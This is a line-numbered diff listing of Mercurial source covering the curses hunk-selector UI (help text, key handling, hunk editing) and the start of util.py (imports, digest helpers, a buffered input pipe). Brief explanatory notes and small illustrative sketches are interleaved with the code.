1619 1616
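getcolorpair() is essentially a two-level cache: pairs are keyed by (fgcolor, bgcolor), and a pair can additionally be aliased under a nickname in colorpairnames. A self-contained, curses-free sketch of that caching pattern (all names here are invented for illustration):

    # toy model of the caching idea only -- no curses involved
    _pairs, _names = {}, {}

    def getpair(fg=-1, bg=-1, name=None):
        if name is not None and name in _names:
            return _names[name]
        pair = _pairs.setdefault((fg, bg), len(_pairs) + 1)
        if name is not None:
            _names[name] = pair
        return pair

    assert getpair(1, -1, name='deletion') == getpair(name='deletion')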
1620 1617 def initcolorpair(self, *args, **kwargs):
1621 1618 """same as getcolorpair."""
1622 1619 self.getcolorpair(*args, **kwargs)
1623 1620
1624 1621 def helpwindow(self):
1625 1622 """print a help window to the screen. exit after any keypress."""
1626 1623 helptext = _(
1627 1624 """ [press any key to return to the patch-display]
1628 1625
1629 1626 The curses hunk selector allows you to interactively choose among the
1630 1627 changes you have made, and confirm only those changes you select for
1631 1628 further processing by the command you are running (such as commit,
1632 1629 shelve, or revert). After confirming the selected changes, the
1633 1630 unselected changes are still present in your working copy, so you can
1634 1631 use the hunk selector multiple times to split large changes into
1635 1632 smaller changesets. The following are valid keystrokes:
1636 1633
1637 1634 x [space] : (un-)select item ([~]/[x] = partly/fully applied)
1638 1635 [enter] : (un-)select item and go to next item of same type
1639 1636 A : (un-)select all items
1640 1637 X : (un-)select all items between current and most-recent
1641 1638 up/down-arrow [k/j] : go to previous/next unfolded item
1642 1639 pgup/pgdn [K/J] : go to previous/next item of same type
1643 1640 right/left-arrow [l/h] : go to child item / parent item
1644 1641 shift-left-arrow [H] : go to parent header / fold selected header
1645 1642 g : go to the top
1646 1643 G : go to the bottom
1647 1644 f : fold / unfold item, hiding/revealing its children
1648 1645 F : fold / unfold parent item and all of its ancestors
1649 1646 ctrl-l : scroll the selected line to the top of the screen
1650 1647 m : edit / resume editing the commit message
1651 1648 e : edit the currently selected hunk
1652 1649 a : toggle all selections
1653 1650 c : confirm selected changes
1654 1651 r : review/edit and confirm selected changes
1655 1652 q : quit without confirming (no changes will be made)
1656 1653 ? : help (what you're currently reading)"""
1657 1654 )
1658 1655
1659 1656 helpwin = curses.newwin(self.yscreensize, 0, 0, 0)
1660 1657 helplines = helptext.split(b"\n")
1661 1658 helplines = helplines + [b" "] * (
1662 1659 self.yscreensize - self.numstatuslines - len(helplines) - 1
1663 1660 )
1664 1661 try:
1665 1662 for line in helplines:
1666 1663 self.printstring(helpwin, line, pairname=b"legend")
1667 1664 except curses.error:
1668 1665 pass
1669 1666 helpwin.refresh()
1670 1667 try:
1671 1668 with self.ui.timeblockedsection(b'crecord'):
1672 1669 helpwin.getkey()
1673 1670 except curses.error:
1674 1671 pass
1675 1672
1676 1673 def commitMessageWindow(self):
1677 1674 """Create a temporary commit message editing window on the screen."""
1678 1675
1679 1676 curses.raw()
1680 1677 curses.def_prog_mode()
1681 1678 curses.endwin()
1682 1679 self.commenttext = self.ui.edit(self.commenttext, self.ui.username())
1683 1680 curses.cbreak()
1684 1681 self.stdscr.refresh()
1685 1682 self.stdscr.keypad(1) # allow arrow-keys to continue to function
1686 1683
1687 1684 def handlefirstlineevent(self):
1688 1685 """
1689 1686 Handle 'g' to navigate to the top most file in the ncurses window.
1690 1687 """
1691 1688 self.currentselecteditem = self.headerlist[0]
1692 1689 currentitem = self.currentselecteditem
1693 1690 # select the parent item recursively until we're at a header
1694 1691 while True:
1695 1692 nextitem = currentitem.parentitem()
1696 1693 if nextitem is None:
1697 1694 break
1698 1695 else:
1699 1696 currentitem = nextitem
1700 1697
1701 1698 self.currentselecteditem = currentitem
1702 1699
1703 1700 def handlelastlineevent(self):
1704 1701 """
1705 1702 Handle 'G' to navigate to the bottom most file/hunk/line depending
1706 1703 on whether the fold is active or not.
1707 1704
1708 1705 If the bottom most file is folded, it navigates to that file and
1709 1706 stops there. If the bottom most file is unfolded, it navigates to
1710 1707 the bottom most hunk in that file and stops there. If the bottom most
1711 1708 hunk is unfolded, it navigates to the bottom most line in that hunk.
1712 1709 """
1713 1710 currentitem = self.currentselecteditem
1714 1711 nextitem = currentitem.nextitem()
1716 1713 # keep stepping to the next item until we reach the last one
1716 1713 while nextitem is not None:
1717 1714 nextitem = currentitem.nextitem()
1718 1715 if nextitem is None:
1719 1716 break
1720 1717 else:
1721 1718 currentitem = nextitem
1722 1719
1723 1720 self.currentselecteditem = currentitem
1724 1721 self.recenterdisplayedarea()
1725 1722
1726 1723 def confirmationwindow(self, windowtext):
1727 1724 """display an informational window, then wait for and return a
1728 1725 keypress."""
1729 1726
1730 1727 confirmwin = curses.newwin(self.yscreensize, 0, 0, 0)
1731 1728 try:
1732 1729 lines = windowtext.split(b"\n")
1733 1730 for line in lines:
1734 1731 self.printstring(confirmwin, line, pairname=b"selected")
1735 1732 except curses.error:
1736 1733 pass
1737 1734 self.stdscr.refresh()
1738 1735 confirmwin.refresh()
1739 1736 try:
1740 1737 with self.ui.timeblockedsection(b'crecord'):
1741 1738 response = chr(self.stdscr.getch())
1742 1739 except ValueError:
1743 1740 response = None
1744 1741
1745 1742 return response
1746 1743
1747 1744 def reviewcommit(self):
1748 1745 """ask for 'y' to be pressed to confirm selected. return True if
1749 1746 confirmed."""
1750 1747 confirmtext = _(
1751 1748 """If you answer yes to the following, your currently chosen patch chunks
1752 1749 will be loaded into an editor. To modify the patch, make the changes in your
1753 1750 editor and save. To accept the current patch as-is, close the editor without
1754 1751 saving.
1755 1752
1756 1753 note: don't add/remove lines unless you also modify the range information.
1757 1754 failing to follow this rule will result in the commit aborting.
1758 1755
1759 1756 are you sure you want to review/edit and confirm the selected changes [yn]?
1760 1757 """
1761 1758 )
1762 1759 with self.ui.timeblockedsection(b'crecord'):
1763 1760 response = self.confirmationwindow(confirmtext)
1764 1761 if response is None:
1765 1762 response = "n"
1766 1763 if response.lower().startswith("y"):
1767 1764 return True
1768 1765 else:
1769 1766 return False
1770 1767
1771 1768 def recenterdisplayedarea(self):
1772 1769 """
1773 1770 once we have scrolled with page up/page down we can be pointing outside
1774 1771 of the display zone. we print the patch with towin=False to compute the
1775 1772 location of the selected item even though it is outside of the displayed
1776 1773 zone, and then update the scroll.
1777 1774 """
1778 1775 self.printitem(towin=False)
1779 1776 self.updatescroll()
1780 1777
1781 1778 def toggleedit(self, item=None, test=False):
1782 1779 """
1783 1780 edit the currently selected chunk
1784 1781 """
1785 1782
1786 1783 def updateui(self):
1787 1784 self.numpadlines = self.getnumlinesdisplayed(ignorefolding=True) + 1
1788 1785 self.chunkpad = curses.newpad(self.numpadlines, self.xscreensize)
1789 1786 self.updatescroll()
1790 1787 self.stdscr.refresh()
1791 1788 self.statuswin.refresh()
1792 1789 self.stdscr.keypad(1)
1793 1790
1794 1791 def editpatchwitheditor(self, chunk):
1795 1792 if chunk is None:
1796 1793 self.ui.write(_(b'cannot edit patch for whole file'))
1797 1794 self.ui.write(b"\n")
1798 1795 return None
1799 1796 if chunk.header.binary():
1800 1797 self.ui.write(_(b'cannot edit patch for binary file'))
1801 1798 self.ui.write(b"\n")
1802 1799 return None
1803 1800
1804 1801 # write the initial patch
1805 1802 patch = stringio()
1806 1803 patch.write(diffhelptext + hunkhelptext)
1807 1804 chunk.header.write(patch)
1808 1805 chunk.write(patch)
1809 1806
1810 1807 # start the editor and wait for it to complete
1811 1808 try:
1812 1809 patch = self.ui.edit(patch.getvalue(), b"", action=b"diff")
1813 1810 except error.Abort as exc:
1814 1811 self.errorstr = stringutil.forcebytestr(exc)
1815 1812 return None
1816 1813 finally:
1817 1814 self.stdscr.clear()
1818 1815 self.stdscr.refresh()
1819 1816
1820 1817 # remove comment lines
1821 1818 patch = [
1822 1819 line + b'\n'
1823 1820 for line in patch.splitlines()
1824 1821 if not line.startswith(b'#')
1825 1822 ]
1826 1823 return patchmod.parsepatch(patch)
1827 1824
1828 1825 if item is None:
1829 1826 item = self.currentselecteditem
1830 1827 if isinstance(item, uiheader):
1831 1828 return
1832 1829 if isinstance(item, uihunkline):
1833 1830 item = item.parentitem()
1834 1831 if not isinstance(item, uihunk):
1835 1832 return
1836 1833
1837 1834 # To go back to that hunk or its replacement at the end of the edit
1838 1835 itemindex = item.parentitem().hunks.index(item)
1839 1836
1840 1837 beforeadded, beforeremoved = item.added, item.removed
1841 1838 newpatches = editpatchwitheditor(self, item)
1842 1839 if newpatches is None:
1843 1840 if not test:
1844 1841 updateui(self)
1845 1842 return
1846 1843 header = item.header
1847 1844 editedhunkindex = header.hunks.index(item)
1848 1845 hunksbefore = header.hunks[:editedhunkindex]
1849 1846 hunksafter = header.hunks[editedhunkindex + 1 :]
1850 1847 newpatchheader = newpatches[0]
1851 1848 newhunks = [uihunk(h, header) for h in newpatchheader.hunks]
1852 1849 newadded = sum([h.added for h in newhunks])
1853 1850 newremoved = sum([h.removed for h in newhunks])
1854 1851 offset = (newadded - beforeadded) - (newremoved - beforeremoved)
1855 1852
1856 1853 for h in hunksafter:
1857 1854 h.toline += offset
1858 1855 for h in newhunks:
1859 1856 h.folded = False
1860 1857 header.hunks = hunksbefore + newhunks + hunksafter
1861 1858 if self.emptypatch():
1862 1859 header.hunks = hunksbefore + [item] + hunksafter
1863 1860 self.currentselecteditem = header
1864 1861 if len(header.hunks) > itemindex:
1865 1862 self.currentselecteditem = header.hunks[itemindex]
1866 1863
1867 1864 if not test:
1868 1865 updateui(self)
1869 1866
1870 1867 def emptypatch(self):
1871 1868 item = self.headerlist
1872 1869 if not item:
1873 1870 return True
1874 1871 for header in item:
1875 1872 if header.hunks:
1876 1873 return False
1877 1874 return True
1878 1875
1879 1876 def handlekeypressed(self, keypressed, test=False):
1880 1877 """
1881 1878 Perform actions based on pressed keys.
1882 1879
1883 1880 Return true to exit the main loop.
1884 1881 """
1885 1882 if keypressed in ["k", "KEY_UP"]:
1886 1883 self.uparrowevent()
1887 1884 elif keypressed in ["K", "KEY_PPAGE"]:
1888 1885 self.uparrowshiftevent()
1889 1886 elif keypressed in ["j", "KEY_DOWN"]:
1890 1887 self.downarrowevent()
1891 1888 elif keypressed in ["J", "KEY_NPAGE"]:
1892 1889 self.downarrowshiftevent()
1893 1890 elif keypressed in ["l", "KEY_RIGHT"]:
1894 1891 self.rightarrowevent()
1895 1892 elif keypressed in ["h", "KEY_LEFT"]:
1896 1893 self.leftarrowevent()
1897 1894 elif keypressed in ["H", "KEY_SLEFT"]:
1898 1895 self.leftarrowshiftevent()
1899 1896 elif keypressed in ["q"]:
1900 1897 raise error.Abort(_(b'user quit'))
1901 1898 elif keypressed in ['a']:
1902 1899 self.flipselections()
1903 1900 elif keypressed in ["c"]:
1904 1901 return True
1905 1902 elif keypressed in ["r"]:
1906 1903 if self.reviewcommit():
1907 1904 self.opts[b'review'] = True
1908 1905 return True
1909 1906 elif test and keypressed in ["R"]:
1910 1907 self.opts[b'review'] = True
1911 1908 return True
1912 1909 elif keypressed in [" ", "x"]:
1913 1910 self.toggleapply()
1914 1911 elif keypressed in ["\n", "KEY_ENTER"]:
1915 1912 self.toggleapply()
1916 1913 self.nextsametype(test=test)
1917 1914 elif keypressed in ["X"]:
1918 1915 self.toggleallbetween()
1919 1916 elif keypressed in ["A"]:
1920 1917 self.toggleall()
1921 1918 elif keypressed in ["e"]:
1922 1919 self.toggleedit(test=test)
1923 1920 elif keypressed in ["f"]:
1924 1921 self.togglefolded()
1925 1922 elif keypressed in ["F"]:
1926 1923 self.togglefolded(foldparent=True)
1927 1924 elif keypressed in ["m"]:
1928 1925 self.commitMessageWindow()
1929 1926 elif keypressed in ["g", "KEY_HOME"]:
1930 1927 self.handlefirstlineevent()
1931 1928 elif keypressed in ["G", "KEY_END"]:
1932 1929 self.handlelastlineevent()
1933 1930 elif keypressed in ["?"]:
1934 1931 self.helpwindow()
1935 1932 self.stdscr.clear()
1936 1933 self.stdscr.refresh()
1937 1934 elif keypressed in [curses.ascii.ctrl("L")]:
1938 1935 # scroll the current line to the top of the screen, and redraw
1939 1936 # everything
1940 1937 self.scrolllines(self.selecteditemstartline)
1941 1938 self.stdscr.clear()
1942 1939 self.stdscr.refresh()
1943 1940
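Because handlekeypressed() is a plain string dispatcher, anything that can supply key names can drive a selector instance; that is exactly what the file-based test mode earlier in this file does. A hedged sketch of driving it directly (ui and uiheaders are assumed to exist, and the stand-in stdscr mirrors the dummystdscr defined inside testchunkselector):

    # illustrative only; test=True avoids the curses-dependent redraw paths
    class fakestdscr(object):
        def clear(self):
            pass
        def refresh(self):
            pass

    sel = curseschunkselector(uiheaders, ui, operation=b'apply')
    sel.stdscr = fakestdscr()
    for key in ["KEY_DOWN", "x", "c"]:   # move down, toggle, confirm
        if sel.handlekeypressed(key, test=True):
            break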
1944 1941 def main(self, stdscr):
1945 1942 """
1946 1943 method to be wrapped by curses.wrapper() for selecting chunks.
1947 1944 """
1948 1945
1949 1946 origsigwinch = sentinel = object()
1950 1947 if util.safehasattr(signal, b'SIGWINCH'):
1951 1948 origsigwinch = signal.signal(signal.SIGWINCH, self.sigwinchhandler)
1952 1949 try:
1953 1950 return self._main(stdscr)
1954 1951 finally:
1955 1952 if origsigwinch is not sentinel:
1956 1953 signal.signal(signal.SIGWINCH, origsigwinch)
1957 1954
1958 1955 def _main(self, stdscr):
1959 1956 self.stdscr = stdscr
1960 1957 # an error during initialization cannot be printed in the curses
1961 1958 # interface; it should be printed by the calling code instead
1962 1959 self.initexc = None
1963 1960 self.yscreensize, self.xscreensize = self.stdscr.getmaxyx()
1964 1961
1965 1962 curses.start_color()
1966 1963 try:
1967 1964 curses.use_default_colors()
1968 1965 except curses.error:
1969 1966 self.usecolor = False
1970 1967
1971 1968 # In some situations we may have some cruft left on the "alternate
1972 1969 # screen" from another program (or previous iterations of ourself), and
1973 1970 # we won't clear it if the scroll region is small enough to comfortably
1974 1971 # fit on the terminal.
1975 1972 self.stdscr.clear()
1976 1973
1977 1974 # don't display the cursor
1978 1975 try:
1979 1976 curses.curs_set(0)
1980 1977 except curses.error:
1981 1978 pass
1982 1979
1983 1980 # available colors: black, blue, cyan, green, magenta, white, yellow
1984 1981 # init_pair(color_id, foreground_color, background_color)
1985 1982 self.initcolorpair(None, None, name=b"normal")
1986 1983 self.initcolorpair(
1987 1984 curses.COLOR_WHITE, curses.COLOR_MAGENTA, name=b"selected"
1988 1985 )
1989 1986 self.initcolorpair(curses.COLOR_RED, None, name=b"deletion")
1990 1987 self.initcolorpair(curses.COLOR_GREEN, None, name=b"addition")
1991 1988 self.initcolorpair(
1992 1989 curses.COLOR_WHITE, curses.COLOR_BLUE, name=b"legend"
1993 1990 )
1994 1991 # newwin([height, width,] begin_y, begin_x)
1995 1992 self.statuswin = curses.newwin(self.numstatuslines, 0, 0, 0)
1996 1993 self.statuswin.keypad(1) # interpret arrow-key, etc. esc sequences
1997 1994
1998 1995 # figure out how much space to allocate for the chunk-pad which is
1999 1996 # used for displaying the patch
2000 1997
2001 1998 # stupid hack to prevent getnumlinesdisplayed from failing
2002 1999 self.chunkpad = curses.newpad(1, self.xscreensize)
2003 2000
2004 2001 # add 1 to account for the last line's text reaching the end of the line
2005 2002 self.numpadlines = self.getnumlinesdisplayed(ignorefolding=True) + 1
2006 2003
2007 2004 try:
2008 2005 self.chunkpad = curses.newpad(self.numpadlines, self.xscreensize)
2009 2006 except curses.error:
2010 2007 self.initexc = fallbackerror(
2011 2008 _(b'this diff is too large to be displayed')
2012 2009 )
2013 2010 return
2014 2011 # initialize selecteditemendline (initial start-line is 0)
2015 2012 self.selecteditemendline = self.getnumlinesdisplayed(
2016 2013 self.currentselecteditem, recursechildren=False
2017 2014 )
2018 2015
2019 2016 while True:
2020 2017 self.updatescreen()
2021 2018 try:
2022 2019 with self.ui.timeblockedsection(b'crecord'):
2023 2020 keypressed = self.statuswin.getkey()
2024 2021 if self.errorstr is not None:
2025 2022 self.errorstr = None
2026 2023 continue
2027 2024 except curses.error:
2028 2025 keypressed = b"foobar"
2029 2026 if self.handlekeypressed(keypressed):
2030 2027 break
2031 2028
2032 2029 if self.commenttext != b"":
2033 2030 whitespaceremoved = re.sub(
2034 2031 br"(?m)^\s.*(\n|$)", b"", self.commenttext
2035 2032 )
2036 2033 if whitespaceremoved != b"":
2037 2034 self.opts[b'message'] = self.commenttext
@@ -1,3628 +1,3658 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import collections
20 20 import contextlib
21 21 import errno
22 22 import gc
23 23 import hashlib
24 24 import itertools
25 import locale
25 26 import mmap
26 27 import os
27 28 import platform as pyplatform
28 29 import re as remod
29 30 import shutil
30 31 import socket
31 32 import stat
32 33 import sys
33 34 import time
34 35 import traceback
35 36 import warnings
36 37
37 38 from .thirdparty import attr
38 39 from .pycompat import (
39 40 delattr,
40 41 getattr,
41 42 open,
42 43 setattr,
43 44 )
44 45 from hgdemandimport import tracing
45 46 from . import (
46 47 encoding,
47 48 error,
48 49 i18n,
49 50 node as nodemod,
50 51 policy,
51 52 pycompat,
52 53 urllibcompat,
53 54 )
54 55 from .utils import (
55 56 compression,
56 57 hashutil,
57 58 procutil,
58 59 stringutil,
59 60 )
60 61
61 62 base85 = policy.importmod('base85')
62 63 osutil = policy.importmod('osutil')
63 64
64 65 b85decode = base85.b85decode
65 66 b85encode = base85.b85encode
66 67
67 68 cookielib = pycompat.cookielib
68 69 httplib = pycompat.httplib
69 70 pickle = pycompat.pickle
70 71 safehasattr = pycompat.safehasattr
71 72 socketserver = pycompat.socketserver
72 73 bytesio = pycompat.bytesio
73 74 # TODO deprecate stringio name, as it is a lie on Python 3.
74 75 stringio = bytesio
75 76 xmlrpclib = pycompat.xmlrpclib
76 77
77 78 httpserver = urllibcompat.httpserver
78 79 urlerr = urllibcompat.urlerr
79 80 urlreq = urllibcompat.urlreq
80 81
81 82 # workaround for win32mbcs
82 83 _filenamebytestr = pycompat.bytestr
83 84
84 85 if pycompat.iswindows:
85 86 from . import windows as platform
86 87 else:
87 88 from . import posix as platform
88 89
89 90 _ = i18n._
90 91
91 92 bindunixsocket = platform.bindunixsocket
92 93 cachestat = platform.cachestat
93 94 checkexec = platform.checkexec
94 95 checklink = platform.checklink
95 96 copymode = platform.copymode
96 97 expandglobs = platform.expandglobs
97 98 getfsmountpoint = platform.getfsmountpoint
98 99 getfstype = platform.getfstype
99 100 groupmembers = platform.groupmembers
100 101 groupname = platform.groupname
101 102 isexec = platform.isexec
102 103 isowner = platform.isowner
103 104 listdir = osutil.listdir
104 105 localpath = platform.localpath
105 106 lookupreg = platform.lookupreg
106 107 makedir = platform.makedir
107 108 nlinks = platform.nlinks
108 109 normpath = platform.normpath
109 110 normcase = platform.normcase
110 111 normcasespec = platform.normcasespec
111 112 normcasefallback = platform.normcasefallback
112 113 openhardlinks = platform.openhardlinks
113 114 oslink = platform.oslink
114 115 parsepatchoutput = platform.parsepatchoutput
115 116 pconvert = platform.pconvert
116 117 poll = platform.poll
117 118 posixfile = platform.posixfile
118 119 readlink = platform.readlink
119 120 rename = platform.rename
120 121 removedirs = platform.removedirs
121 122 samedevice = platform.samedevice
122 123 samefile = platform.samefile
123 124 samestat = platform.samestat
124 125 setflags = platform.setflags
125 126 split = platform.split
126 127 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
127 128 statisexec = platform.statisexec
128 129 statislink = platform.statislink
129 130 umask = platform.umask
130 131 unlink = platform.unlink
131 132 username = platform.username
132 133
133 134
134 135 def setumask(val):
135 136 ''' updates the umask; used by the chg server '''
136 137 if pycompat.iswindows:
137 138 return
138 139 os.umask(val)
139 140 global umask
140 141 platform.umask = umask = val & 0o777
141 142
142 143
143 144 # small compat layer
144 145 compengines = compression.compengines
145 146 SERVERROLE = compression.SERVERROLE
146 147 CLIENTROLE = compression.CLIENTROLE
147 148
148 149 try:
149 150 recvfds = osutil.recvfds
150 151 except AttributeError:
151 152 pass
152 153
153 154 # Python compatibility
154 155
155 156 _notset = object()
156 157
157 158
158 159 def bitsfrom(container):
159 160 bits = 0
160 161 for bit in container:
161 162 bits |= bit
162 163 return bits
163 164
164 165
165 166 # Python 2.6 still has deprecation warnings enabled by default. We do not want
166 167 # to display anything to standard users, so detect whether we are running tests
167 168 # and only use Python deprecation warnings in that case.
168 169 _dowarn = bool(encoding.environ.get(b'HGEMITWARNINGS'))
169 170 if _dowarn:
170 171 # explicitly unfilter our warning for python 2.7
171 172 #
172 173 # The option of setting PYTHONWARNINGS in the test runner was investigated.
173 174 # However, a module name set through PYTHONWARNINGS is matched exactly, so
174 175 # we cannot set 'mercurial' and have it match e.g. 'mercurial.scmutil'. This
175 176 # makes the whole PYTHONWARNINGS approach useless for our use case.
176 177 warnings.filterwarnings('default', '', DeprecationWarning, 'mercurial')
177 178 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext')
178 179 warnings.filterwarnings('default', '', DeprecationWarning, 'hgext3rd')
179 180 if _dowarn and pycompat.ispy3:
180 181 # silence warning emitted by passing user string to re.sub()
181 182 warnings.filterwarnings(
182 183 'ignore', 'bad escape', DeprecationWarning, 'mercurial'
183 184 )
184 185 warnings.filterwarnings(
185 186 'ignore', 'invalid escape sequence', DeprecationWarning, 'mercurial'
186 187 )
187 188 # TODO: reinvent imp.is_frozen()
188 189 warnings.filterwarnings(
189 190 'ignore',
190 191 'the imp module is deprecated',
191 192 DeprecationWarning,
192 193 'mercurial',
193 194 )
194 195
195 196
196 197 def nouideprecwarn(msg, version, stacklevel=1):
197 198 """Issue an python native deprecation warning
198 199
199 200 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
200 201 """
201 202 if _dowarn:
202 203 msg += (
203 204 b"\n(compatibility will be dropped after Mercurial-%s,"
204 205 b" update your code.)"
205 206 ) % version
206 207 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
207 208
208 209
209 210 DIGESTS = {
210 211 b'md5': hashlib.md5,
211 212 b'sha1': hashutil.sha1,
212 213 b'sha512': hashlib.sha512,
213 214 }
214 215 # List of digest types from strongest to weakest
215 216 DIGESTS_BY_STRENGTH = [b'sha512', b'sha1', b'md5']
216 217
217 218 for k in DIGESTS_BY_STRENGTH:
218 219 assert k in DIGESTS
219 220
220 221
221 222 class digester(object):
222 223 """helper to compute digests.
223 224
224 225 This helper can be used to compute one or more digests given their name.
225 226
226 227 >>> d = digester([b'md5', b'sha1'])
227 228 >>> d.update(b'foo')
228 229 >>> [k for k in sorted(d)]
229 230 ['md5', 'sha1']
230 231 >>> d[b'md5']
231 232 'acbd18db4cc2f85cedef654fccc4a4d8'
232 233 >>> d[b'sha1']
233 234 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
234 235 >>> digester.preferred([b'md5', b'sha1'])
235 236 'sha1'
236 237 """
237 238
238 239 def __init__(self, digests, s=b''):
239 240 self._hashes = {}
240 241 for k in digests:
241 242 if k not in DIGESTS:
242 243 raise error.Abort(_(b'unknown digest type: %s') % k)
243 244 self._hashes[k] = DIGESTS[k]()
244 245 if s:
245 246 self.update(s)
246 247
247 248 def update(self, data):
248 249 for h in self._hashes.values():
249 250 h.update(data)
250 251
251 252 def __getitem__(self, key):
252 253 if key not in DIGESTS:
253 254 raise error.Abort(_(b'unknown digest type: %s') % key)
254 255 return nodemod.hex(self._hashes[key].digest())
255 256
256 257 def __iter__(self):
257 258 return iter(self._hashes)
258 259
259 260 @staticmethod
260 261 def preferred(supported):
261 262 """returns the strongest digest type in both supported and DIGESTS."""
262 263
263 264 for k in DIGESTS_BY_STRENGTH:
264 265 if k in supported:
265 266 return k
266 267 return None
267 268
268 269
269 270 class digestchecker(object):
270 271 """file handle wrapper that additionally checks content against a given
271 272 size and digests.
272 273
273 274 d = digestchecker(fh, size, {'md5': '...'})
274 275
275 276 When multiple digests are given, all of them are validated.
276 277 """
277 278
278 279 def __init__(self, fh, size, digests):
279 280 self._fh = fh
280 281 self._size = size
281 282 self._got = 0
282 283 self._digests = dict(digests)
283 284 self._digester = digester(self._digests.keys())
284 285
285 286 def read(self, length=-1):
286 287 content = self._fh.read(length)
287 288 self._digester.update(content)
288 289 self._got += len(content)
289 290 return content
290 291
291 292 def validate(self):
292 293 if self._size != self._got:
293 294 raise error.Abort(
294 295 _(b'size mismatch: expected %d, got %d')
295 296 % (self._size, self._got)
296 297 )
297 298 for k, v in self._digests.items():
298 299 if v != self._digester[k]:
299 300 # i18n: first parameter is a digest name
300 301 raise error.Abort(
301 302 _(b'%s mismatch: expected %s, got %s')
302 303 % (k, v, self._digester[k])
303 304 )
304 305
305 306
306 307 try:
307 308 buffer = buffer
308 309 except NameError:
309 310
310 311 def buffer(sliceable, offset=0, length=None):
311 312 if length is not None:
312 313 return memoryview(sliceable)[offset : offset + length]
313 314 return memoryview(sliceable)[offset:]
314 315
315 316
316 317 _chunksize = 4096
317 318
318 319
319 320 class bufferedinputpipe(object):
320 321 """a manually buffered input pipe
321 322
322 323 Python will not let us use buffered IO and lazy reading with 'polling' at
323 324 the same time. We cannot probe the buffer state and select will not detect
324 325 that data are ready to read if they are already buffered.
325 326
326 327 This class lets us work around that by implementing its own buffering
327 328 (allowing efficient readline) while offering a way to know if the buffer is
328 329 empty from the output (allowing collaboration of the buffer with polling).
329 330
330 331 This class lives in the 'util' module because it makes use of the 'os'
331 332 module from the python stdlib.
332 333 """
333 334
334 335 def __new__(cls, fh):
335 336 # If we receive a fileobjectproxy, we need to use a variation of this
336 337 # class that notifies observers about activity.
337 338 if isinstance(fh, fileobjectproxy):
338 339 cls = observedbufferedinputpipe
339 340
340 341 return super(bufferedinputpipe, cls).__new__(cls)
341 342
342 343 def __init__(self, input):
343 344 self._input = input
344 345 self._buffer = []
345 346 self._eof = False
346 347 self._lenbuf = 0
347 348
348 349 @property
349 350 def hasbuffer(self):
350 351 """True is any data is currently buffered
351 352
352 353 This will be used externally a pre-step for polling IO. If there is
353 354 already data then no polling should be set in place."""
354 355 return bool(self._buffer)
355 356
356 357 @property
357 358 def closed(self):
358 359 return self._input.closed
359 360
360 361 def fileno(self):
361 362 return self._input.fileno()
362 363
363 364 def close(self):
364 365 return self._input.close()
365 366
366 367 def read(self, size):
367 368 while (not self._eof) and (self._lenbuf < size):
368 369 self._fillbuffer()
369 370 return self._frombuffer(size)
370 371
371 372 def unbufferedread(self, size):
372 373 if not self._eof and self._lenbuf == 0:
373 374 self._fillbuffer(max(size, _chunksize))
374 375 return self._frombuffer(min(self._lenbuf, size))
375 376
376 377 def readline(self, *args, **kwargs):
377 378 if len(self._buffer) > 1:
378 379 # this should not happen because both read and readline end with a
379 380 # _frombuffer call that collapses it.
380 381 self._buffer = [b''.join(self._buffer)]
381 382 self._lenbuf = len(self._buffer[0])
382 383 lfi = -1
383 384 if self._buffer:
384 385 lfi = self._buffer[-1].find(b'\n')
385 386 while (not self._eof) and lfi < 0:
386 387 self._fillbuffer()
387 388 if self._buffer:
388 389 lfi = self._buffer[-1].find(b'\n')
389 390 size = lfi + 1
390 391 if lfi < 0: # end of file
391 392 size = self._lenbuf
392 393 elif len(self._buffer) > 1:
393 394 # we need to take previous chunks into account
394 395 size += self._lenbuf - len(self._buffer[-1])
395 396 return self._frombuffer(size)
396 397
397 398 def _frombuffer(self, size):
398 399 """return at most 'size' data from the buffer
399 400
400 401 The data are removed from the buffer."""
401 402 if size == 0 or not self._buffer:
402 403 return b''
403 404 buf = self._buffer[0]
404 405 if len(self._buffer) > 1:
405 406 buf = b''.join(self._buffer)
406 407
407 408 data = buf[:size]
408 409 buf = buf[len(data) :]
409 410 if buf:
410 411 self._buffer = [buf]
411 412 self._lenbuf = len(buf)
412 413 else:
413 414 self._buffer = []
414 415 self._lenbuf = 0
415 416 return data
416 417
417 418 def _fillbuffer(self, size=_chunksize):
418 419 """read data to the buffer"""
419 420 data = os.read(self._input.fileno(), size)
420 421 if not data:
421 422 self._eof = True
422 423 else:
423 424 self._lenbuf += len(data)
424 425 self._buffer.append(data)
425 426
426 427 return data
427 428
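# Illustrative sketch, not part of the original module: one way bufferedinputpipe
# could cooperate with select-based polling. The pipe wiring and helper name are
# hypothetical, and the select() call assumes a POSIX platform where pipe file
# descriptors are selectable.
def _bufferedinputpipe_sketch():
    import select

    rfd, wfd = os.pipe()
    os.write(wfd, b'hello\nworld\n')
    pipe = bufferedinputpipe(os.fdopen(rfd, 'rb'))
    if not pipe.hasbuffer:
        # nothing is buffered yet, so polling the underlying fd is safe
        select.select([pipe.fileno()], [], [], 0)
    first = pipe.readline()  # returns b'hello\n'; b'world\n' stays buffered
    assert first == b'hello\n'
    assert pipe.hasbuffer
    return first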
428 429
429 430 def mmapread(fp, size=None):
430 431 if size == 0:
431 432 # size of 0 to mmap.mmap() means "all data"
432 433 # rather than "zero bytes", so special case that.
433 434 return b''
434 435 elif size is None:
435 436 size = 0
436 437 try:
437 438 fd = getattr(fp, 'fileno', lambda: fp)()
438 439 return mmap.mmap(fd, size, access=mmap.ACCESS_READ)
439 440 except ValueError:
440 441 # Empty files cannot be mmapped, but mmapread should still work. Check
441 442 # if the file is empty, and if so, return an empty buffer.
442 443 if os.fstat(fd).st_size == 0:
443 444 return b''
444 445 raise
445 446
446 447
447 448 class fileobjectproxy(object):
448 449 """A proxy around file objects that tells a watcher when events occur.
449 450
